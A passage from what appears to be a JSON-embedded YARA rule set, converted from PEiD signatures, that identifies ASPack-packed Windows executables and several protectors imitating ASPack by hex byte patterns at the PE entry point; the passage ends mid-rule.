            "rule": "rule ASPack_v107b_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 75 }\r\n        $b = { 60 E8 00 00 00 00 5D ?? ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPAck_1061b: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 75 00 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_108: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 75 01 90 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v212_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v2xx: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 70 05 ?? ?? EB }\r\n        $b = { A8 03 00 00 61 75 08 B8 01 00 00 00 C2 0C 00 68 00 00 00 00 C3 8B 85 26 04 00 00 8D 8D 3B 04 00 00 51 50 FF 95 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v21_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_102b: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 96 78 43 00 B8 90 78 43 00 03 C5 2B 85 7D 7C 43 00 89 85 89 7C 43 00 80 BD 74 7C 43 00 00 75 15 FE 85 74 7C 43 00 E8 1D 00 00 00 E8 F7 01 00 00 E8 8E 02 00 00 8B 85 75 7C 43 00 03 85 89 7C 43 00 89 44 24 1C 61 FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v21: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E9 3D }\r\n        $b = { 60 E8 72 05 00 00 EB 33 87 DB 90 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PackerAspack_v212_wwwaspackcom: PEiD\r\n{\r\n    strings:\r\n        $a = { ?8 ?? ?0 00 ?? ?? ?? ?? ?D ?? ?? ?? ?? ?? ?? ?? ?? ?? 5? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?3 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?F ?? ?? ?3 ?? ?? ?? 8? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?0 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?F 95 ?? ?? ?? ?? 8? ?? ?D ?? ?? ?? ?? 5? }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v211c_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 E9 59 04 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v104b_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 2B 85 ?? 0B DE ?? 89 85 17 DE ?? ?? 80 BD 01 DE }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_105b_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED CE 3A 44 00 B8 C8 3A 44 00 03 C5 2B 85 B5 3E 44 00 89 85 C1 3E 44 00 80 BD AC 3E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Aspack_v212_wwwaspackcom_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { ?8 ?? ?0 00 ?? ?? ?? ?? ?D ?? ?? ?? ?? ?? ?? ?? ?? ?? 5? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?3 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?F ?? ?? ?3 ?? ?? ?? 8? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?0 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?F 95 ?? ?? ?? ?? 8? ?? ?D ?? ?? ?? ?? 5? }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule AHTeam_EP_Protector_03_fake_ASPack_212_FEUERRADER: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_108_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 75 01 90 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_v032a_fake_ASPack_211d_emadicius: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v102a_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED 3E D9 43 ?? B8 38 ?? ?? ?? 03 C5 2B 85 0B DE 43 ?? 89 85 17 DE 43 ?? 80 BD 01 DE 43 ?? ?? 75 15 FE 85 01 DE 43 ?? E8 1D ?? ?? ?? E8 79 02 ?? ?? E8 12 03 ?? ?? 8B 85 03 DE 43 ?? 03 85 17 DE 43 ?? 89 44 24 1C 61 FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v2000_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 70 05 00 00 EB 4C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_v032a_fake_ASPack_211d_emadicius_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_105b_by_Hint_WIN_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { 75 00 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_1083: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 0A 4A 44 00 BB 04 4A 44 00 03 DD 2B 9D B1 50 44 00 83 BD AC 50 44 00 00 89 9D BB 4E 44 00 0F 85 17 05 00 00 8D 85 D1 50 44 00 50 FF 95 94 51 44 00 89 85 CD 50 44 00 8B F8 8D 9D DE 50 44 00 53 50 FF 95 90 51 44 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v108_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 75 01 FF E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_102a_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 3E D9 43 00 B8 38 ?? ?? 00 03 C5 2B 85 0B DE 43 00 89 85 17 DE 43 00 80 BD 01 DE 43 00 00 75 15 FE 85 01 DE 43 00 E8 1D 00 00 00 E8 79 02 00 00 E8 12 03 00 00 8B 85 03 DE 43 00 03 85 17 DE 43 00 89 44 24 1C 61 FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v106b_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 61 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v211d_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 00 00 00 CD 20 E8 00 00 00 00 5E 2B C9 58 74 02 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v212: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 ?? ?? ?? E9 EB 04 5D 45 55 C3 E8 }\r\n        $b = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v211: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 ?? ?? ?? EB 09 5D 55 81 ED 39 39 44 ?? C3 E9 3D }\r\n        $b = { 60 E9 3D 04 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule _PseudoSigner_01_ASPack_2xx_Heuristic_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 A8 03 00 00 61 75 08 B8 01 00 00 00 C2 0C 00 68 00 00 00 00 C3 8B 85 26 04 00 00 8D 8D 3B 04 00 00 51 50 FF 95 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_101b_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED D2 2A 44 00 B8 CC 2A 44 00 03 C5 2B 85 A5 2E 44 00 89 85 B1 2E 44 00 80 BD 9C 2E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Aspack_v212_wwwaspackcom: PEiD\r\n{\r\n    strings:\r\n        $a = { ?8 ?? ?0 00 ?? ?? ?? ?? ?D ?? ?? ?? ?? ?? ?? ?? ?? ?? 5? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?3 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?F ?? ?? ?3 ?? ?? ?? 8? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?0 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?F 95 ?? ?? ?? ?? 8? }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v2xx_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { A8 03 00 00 61 75 08 B8 01 00 00 00 C2 0C 00 68 00 00 00 00 C3 8B 85 26 04 00 00 8D 8D 3B 04 00 00 51 50 FF 95 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v2001_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 72 05 00 00 EB 4C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_032a_fake_ASPack_212_emadicius: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 73 00 00 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B }\r\n        $b = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 A0 02 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule _PseudoSigner_01_ASPack_2xx_Heuristic_Anorganix_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 A8 03 00 00 61 75 08 B8 01 00 00 00 C2 0C 00 68 00 00 00 00 C3 8B 85 26 04 00 00 8D 8D 3B 04 00 00 51 50 FF 95 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v107b_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? 60 E8 2B 03 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v100b_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED 3E D9 43 ?? B8 38 ?? ?? ?? 03 C5 2B 85 0B DE 43 ?? 89 85 17 DE 43 ?? 80 BD 01 DE 43 ?? ?? 75 15 FE 85 01 DE 43 ?? E8 1D ?? ?? ?? E8 79 02 ?? ?? E8 12 03 ?? ?? 8B 85 03 DE 43 ?? 03 85 17 DE 43 ?? 89 44 24 1C 61 FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v211c_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 E9 59 04 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v211b_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 00 00 00 EB 09 5D 55 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_105b_by: PEiD\r\n{\r\n    strings:\r\n        $a = { 75 00 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_v032a_fake_ASPack_212_emadicius_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 A0 02 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10802_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 75 01 90 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v2001_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 72 05 00 00 EB 33 87 DB 90 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v107b: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D B8 03 }\r\n        $b = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 2B 85 ?? 0B DE ?? 89 85 17 DE ?? ?? 80 BD 01 DE }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_100b_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 92 1A 44 00 B8 8C 1A 44 00 03 C5 2B 85 CD 1D 44 00 89 85 D9 1D 44 00 80 BD C4 1D 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v101b_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED CE 3A 44 ?? B8 C8 3A 44 ?? 03 C5 2B 85 B5 3E 44 ?? 89 85 C1 3E 44 ?? 80 BD AC 3E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10801_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 ED 23 6A 44 00 BB 10 ?? 44 00 03 DD 2B 9D 72 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10802_Hint_WIN_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 75 01 90 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v2xx_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { A8 03 ?? ?? 61 75 08 B8 01 ?? ?? ?? C2 0C ?? 68 ?? ?? ?? ?? C3 8B 85 26 04 ?? ?? 8D 8D 3B 04 ?? ?? 51 50 FF 95 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v101b: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 5D 81 ED 3E D9 43 B8 38 03 C5 2B 85 0B DE 43 89 85 17 DE 43 80 BD 01 DE 43 75 15 FE 85 01 DE 43 E8 1D E8 79 02 E8 12 03 8B }\r\n        $b = { 60 E8 ?? ?? ?? ?? 5D 81 ED D2 2A 44 ?? B8 CC 2A 44 ?? 03 C5 2B 85 A5 2E 44 ?? 89 85 B1 2E 44 ?? 80 BD 9C 2E 44 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v10803_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 57 51 53 E8 ?? ?? ?? ?? 5D 8B C5 81 ED ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 83 E8 09 89 85 ?? ?? ?? ?? 0F B6 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_104b_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED ?? ?? ?? 00 B8 ?? ?? ?? 00 03 C5 2B 85 ?? 12 9D ?? 89 85 1E 9D ?? 00 80 BD 08 9D ?? 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_107b_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 75 ?? E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v103b: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 5D 81 ED CE 3A 44 B8 C8 3A 44 03 C5 2B 85 B5 3E 44 89 85 C1 3E 44 80 BD AC 3E }\r\n        $b = { 60 E8 ?? ?? ?? ?? 5D 81 ED AE 98 43 ?? B8 A8 98 43 ?? 03 C5 2B 85 18 9D 43 ?? 89 85 24 9D 43 ?? 80 BD 0E 9D 43 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_102b_or_10803: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v211d: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 ?? ?? ?? E9 EB 04 5D 45 55 C3 E8 01 ?? ?? ?? EB 5D BB ED FF FF FF 03 DD 81 }\r\n        $b = { 60 E8 02 00 00 00 EB 09 5D 55 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v211b: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 ?? ?? ?? EB 09 5D 55 81 ED 39 39 44 ?? C3 E9 59 }\r\n        $b = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 E9 3D 04 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v211c: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 ?? ?? ?? EB 09 5D }\r\n        $b = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 E9 59 04 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v105b_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED CE 3A 44 ?? B8 C8 3A 44 ?? 03 C5 2B 85 B5 3E 44 ?? 89 85 C1 3E 44 ?? 80 BD AC 3E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_032a_fake_ASPack_212_emadicius_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v102b_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 96 78 43 00 B8 90 78 43 00 03 C5 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_108_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 75 01 FF E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v1061b_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED EA A8 43 ?? B8 E4 A8 43 ?? 03 C5 2B 85 78 AD 43 ?? 89 85 84 AD 43 ?? 80 BD 6E AD 43 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v102a_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED 06 ?? ?? ?? 64 A0 23 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_2xwithouth_Poly_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB EC FF FF FF 03 DD 81 EB 00 40 1C 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_1061b_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED EA A8 43 00 B8 E4 A8 43 00 03 C5 2B 85 78 AD 43 00 89 85 84 AD 43 00 80 BD 6E AD 43 00 00 75 15 FE 85 6E AD 43 00 E8 1D 00 00 00 E8 73 02 00 00 E8 0A 03 00 00 8B 85 70 AD 43 00 03 85 84 AD 43 00 89 44 24 1C 61 FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10804: PEiD\r\n{\r\n    strings:\r\n        $a = { A8 03 61 75 08 B8 01 C2 0C 68 C3 8B 85 26 04 8D 8D 3B 04 51 50 FF }\r\n        $b = { 60 E8 41 06 00 00 EB 41 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v100b_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED 92 1A 44 ?? B8 8C 1A 44 ?? 03 C5 2B 85 CD 1D 44 ?? 89 85 D9 1D 44 ?? 80 BD C4 1D 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10804_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_10801_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 75 ?? 90 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_101b: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED D2 2A 44 00 B8 CC 2A 44 00 03 C5 2B 85 A5 2E 44 00 89 85 B1 2E 44 00 80 BD 9C 2E 44 00 00 75 15 FE 85 9C 2E 44 00 E8 1D 00 00 00 E8 E4 01 00 00 E8 7A 02 00 00 8B 85 9D 2E 44 00 03 85 B1 2E 44 00 89 44 24 1C 61 FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10804_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 41 06 00 00 EB 41 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_103b_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED AE 98 43 00 B8 A8 98 43 00 03 C5 2B 85 18 9D 43 00 89 85 24 9D 43 00 80 BD 0E 9D 43 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v103b_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED AE 98 43 ?? B8 A8 98 43 ?? 03 C5 2B 85 18 9D 43 ?? 89 85 24 9D 43 ?? 80 BD 0E 9D 43 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_v032a_fake_ASPack_212_emadicius_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 73 00 00 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v101b_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED D2 2A 44 ?? B8 CC 2A 44 ?? 03 C5 2B 85 A5 2E 44 ?? 89 85 B1 2E 44 ?? 80 BD 9C 2E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10802_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 ED 23 6A 44 00 BB 10 ?? 44 00 03 DD 2B 9D 72 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_105b: PEiD\r\n{\r\n    strings:\r\n        $a = { 75 00 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_01_ASPack_2xx_Heuristic: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 A8 03 00 00 61 75 08 B8 01 00 00 00 C2 0C 00 68 00 00 00 00 C3 8B 85 26 04 00 00 8D 8D 3B 04 00 00 51 50 FF 95 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_v032a_fake_ASPack_212_emadicius: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 A0 02 EB 05 